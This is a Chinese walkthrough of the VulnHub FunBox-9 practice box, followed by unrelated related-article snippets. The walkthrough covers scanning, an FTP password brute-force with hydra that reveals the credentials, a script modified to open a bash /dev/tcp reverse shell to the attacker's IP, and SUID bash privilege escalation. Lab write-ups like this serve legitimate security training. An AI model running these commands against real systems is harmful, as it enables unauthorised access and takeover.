vulnhub靶场之FunBox-9

一.环境搭建

1.靶场描述

It's a box for beginners, but not easy. Gather careful !!!
Hint:
Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.
Enjoy the game and WYSIWYG ! 
This works better with VirtualBox rather than VMware
 

2.靶场下载

Funbox: GaoKao ~ VulnHub

image-20240526205715706

3.靶场启动

image-20240526205755099

二.信息收集

1.寻找靶场真实IP地址

nmap -sP 192.168.2.0/24
 

image-20240526210027543

arp-scan -l
 

image-20240526210108854

通过上面两个命令我们知道靶场真实IP地址为192.168.2.9
 

2.探测端口及服务

nmap -p- -sV 192.168.2.9
 

image-20240526210433043

开启了21端口,服务为ftp
开启了22端口,服务为ssh
开启了80端口,服务为apache2
开启了3306端口,服务为mysql
 

三.渗透测试

1.访问web服务

http://192.168.2.9

image-20240526211101872

2.扫描web服务

1)nikto扫描

nikto -h http://192.168.2.9
 

image-20240526212518825

2)dirsearch扫描

dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent
 

image-20240526212428558

3)dirb扫描

dirb http://192.168.2.9
 

image-20240526212401279

4)gobuster扫描

gobuster dir -u http://192.168.2.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php.txt.html,zip
 

image-20240526212325048

都没有扫描到任何有用的信息,我们知道开启了21端口,我们查看ftp服务

3.渗透测试

1)ftp服务

ftp 192.168.2.9
 

image-20240526212731390

我们可以看到一个文件,我们进行查看

image-20240526212916428

sky@%L,我们可以看到用户名是sky,密码我们进行爆破

hydra -l sky -P  /usr/share/wordlists/rockyou.txt  ftp 192.168.2.9
 

image-20240526213515192

我们看到密码是thebest,我们进行登录

ftp 192.168.2.9
 

image-20240526213608449

我们可以看到登录成功,根目录有一个文件,我们进行查看

2)反弹shell

我们查看user.flag文件,可以看到是一个脚本,我们修改它,让它反弹shell

image-20240526214053917

bash -i >& /dev/tcp/192.168.2.8/6666 0>&1
 

image-20240531213602418

我们可以看到反弹成功,我们进行提权

3)提权

find / -perm -u=s -type f 2>/dev/null     # 查看提权方式
 

image-20240531213702464

我们可以看到bash提权,我们进行查看

image-20240531213835883

我们可以看到提权方式是bash -p

image-20240531213905156

image-20240531214100392

到这里,渗透测试结束

这里我们只要掌握ftp爆破和hydra爆破即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/19882.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

博士毕业论文/CTEX/LATEX

LATEX环境安装 CTEX 安装 (垃圾,不要装) 运行 clean.batcomp.bat 缺少字体 Couldn’t find Adobe Heiti S.cfg’ miktex-maketfm: No creation rule for font “Adobe Heiti Std”.解决方法:其实就是下载这四个字体之后&…

【大比武10】行业垂直大模型应用在档案管理中的探索

关注我们 - 数字罗塞塔计划 - # 大比武2024 本篇是参加“华夏伟业”杯第二届档案信息化公司业务与技术实力大比武(简称“大比武 2024”)的投稿文章,来自广州龙建达电子股份有限公司,作者:陶宣任。 在这个人工智能技…

深入理解flask规则构建与动态变量应用

新书上架~👇全国包邮奥~ python实用小工具开发教程http://pythontoolsteach.com/3 欢迎关注我👆,收藏下次不迷路┗|`O′|┛ 嗷~~ 目录 一、引言 二、Flask规则基础 1. 静态规则与动态规则 2. 规则语法与结构 三、动态变量应用…

CISCN 2022 初赛 ez_usb

还是从第一个 URB向后看 发现 同时 存在 2.8.1 2.10.1 2.4.1 但是显然 2.4.1 是7个字节 不满足 usb流量要求 只考虑 2.8.1 和 2.10.1 tshark -r ez_usb.pcapng -T json -Y "usb.src \"2.8.1\"" -e usbhid.data > 281.json 正常取数据即可 import js…

【vue】v-for只显示前几个数据,超出显示查看更多

v-for只显示前几个数据&#xff0c;超出显示查看更多 如图 <div v-for"(item,index) in list.slice(0,3)" :key"index"><div class"degreeNo" :class"index0?noOne:index1?noTwo:index2?noThree:"> NO{{index1}}:<…

读《Diffusion Models: A Comprehensive Survey of Methods and Applications》综述

读《Diffusion Models: A Comprehensive Survey of Methods and Applications》综述 关于此文&#xff0c;我的一个见解想法&#xff0c;重点关注他怎么描述 「Diffusion Model」的引用的&#xff0c;以及未来方向就好了。当然从这篇文章可以知道 「Diffusion Model」的一个基石…

HR人才测评,企业人才综合素质测评?

HR企业人才综合素质测评是一种评估企业人才综合素质的方法。该测评方法通过对人才的综合能力、专业技能、沟通协调能力、团队合作能力、领导管理能力等方面进行评估&#xff0c;以期为企业提供更全面、更客观、更科学的人才选拔和管理的依据。 点击这里了解&#xff1a;『企业…

强化学习的应用场景:何时使用强化学习?

RL 强化学习的应用场景&#xff1a;何时使用强化学习&#xff1f;强化学习的基本原理适用场景1. 连续决策过程2. 不完全信息3. 动态环境4. 长期回报优化5. 无明确监督信号 实际案例游戏AI机器人控制自主驾驶金融交易推荐系统 结论 强化学习的应用场景&#xff1a;何时使用强化学…

免费生物蛋白质的类chatgpt工具助手copilot:小分子、蛋白的折叠、对接

参考: https://310.ai/copilot 可以通过自然语言通话晚上蛋白质的相关处理:生成序列、折叠等 应该是agent技术调用不同工具实现 从UniProt数据库中搜索和加载蛋白质。使用ESM Fold方法折叠蛋白质。使用310.ai基础模型设计新蛋白质。使用TM-Align方法比较蛋白质。利用Protei…

整合框架(spring...) 统一异常处理

1、 我们想让异常结果也显示为统一的返回结果对象&#xff0c;并且统一处理系统的异常信息&#xff0c;那么需要统一异常处理。 附加&#xff1a;创建封装错误状态码和错误消息VO 代码如下&#xff1a; Result import io.swagger.v3.oas.annotations.media.Schema; impo…

MOE模型入门

一、目录 定义&#xff1a;MOE架构代表类型如何解决expert 平衡的&#xff1f;而不是集中到某一专家。如何训练、微调MOE模型&#xff1f;基础架构优缺点不同MOE 模型实现方式、训练方法 二、实现 定义&#xff1a;MOE架构 MOE:混合专家模型&#xff0c;多个专家共同决策的模…

Redis 探索之旅(进阶)

目录 今日良言&#xff1a;从不缺乏从头开始的勇气 一、持久化 1、RDB 2、AOF 二、Redis 的事务 三、主从复制 四、哨兵模式 五、集群模式 六、缓存 七、分布式锁 今日良言&#xff1a;从不缺乏从头开始的勇气 一、持久化 持久化就是把数据存储在硬盘上&#xff0c;无…

CUDA学习(2)

什么是CUDA CUDA&#xff08;Compute Unified Device Architecture&#xff09;&#xff0c;统一计算设备架构&#xff0c;英伟达推出的基于其GPU的通用高性能计算平台和编程模型。 借助CUDA&#xff0c;开发者可以充分利用英伟达GPU的强大计算能力加速各种计算任务。 软件生…

保险 - day12 时序数据库influxdb

时序数据库 时序数据库是近几年一个新的概念&#xff0c;与传统的Mysql关系型数据库相比&#xff0c;它的最大的特点是&#xff1a;数据按照时间顺序存储。举例来说&#xff0c;日志数据&#xff0c;是以时间顺序存储的&#xff0c;所以用时序数据库存储是一种很好的选择。使用…

【stm32】stm32f407 ch340下载

一、接线 1、ch340 Vcc短接3v3 5v---------5v GND-----GND TX ------RX RX --------TX 2、stm32F407 如上图&#xff0c;我们需要进入isp下载模式&#xff0c;接线图如下 二、下载 使用FlyMcu选择你要下载的程序文件中的.hex文件&#xff0c; 然后配置图如下&#xff1…

Visual Studio的桌面快捷方式图标不显示

1.问题描述 以下以Visual Studio 2019举例&#xff0c; 正常图标&#xff1a; 但是当前Visual Studio的桌面快捷方式图标不显示了&#xff1f; 2.问题原因分析 Visual Studio 2019桌面快捷方式图标不显示可能由以下几个原因造成&#xff1a; 图标缓存问题&#xff1a;Windo…

五种主流数据库:常用数据类型

在设计数据库的表结构时&#xff0c;我们需要明确表中包含哪些字段以及字段的数据类型。字段的数据类型定义了该字段能够存储的数据种类以及支持的操作。 本文将会介绍五种主流数据库中常用的数据类型以及如何选择合适的数据类型&#xff0c;包括 MySQL、Oracle、SQL Server、…

【Linux】从零开始认识进程间通信 —— 共享内存

送给大家一句话&#xff1a; 吃苦受难绝不是乐事一桩&#xff0c;但是如果您恰好陷入困境&#xff0c;我很想告诉您&#xff1a;“尽管眼前十分困难&#xff0c;可日后这段经历说不定就会开花结果。”请您这样换位思考、奋力前行。 -- 村上春树 &#x1f506;&#x1f506;&…

[数据集][目标检测]打架检测数据集VOC格式3146张2类别

数据集格式&#xff1a;Pascal VOC格式(不包含分割的txt文件&#xff0c;仅仅包含jpg图片和对应的xml) 图片数量(jpg文件个数)&#xff1a;3146 标注数量(xml文件个数)&#xff1a;3146 标注类别数&#xff1a;2 标注类别名称:["nofight","fight"] 每个类别…

c# - 运算符 << 不能应用于 long 和 long 类型的操作数

Compiler Error CS0019 c# - 运算符 << 不能应用于 long 和 long 类型的操作数 处理方法 特此记录 anlog 2024年5月30日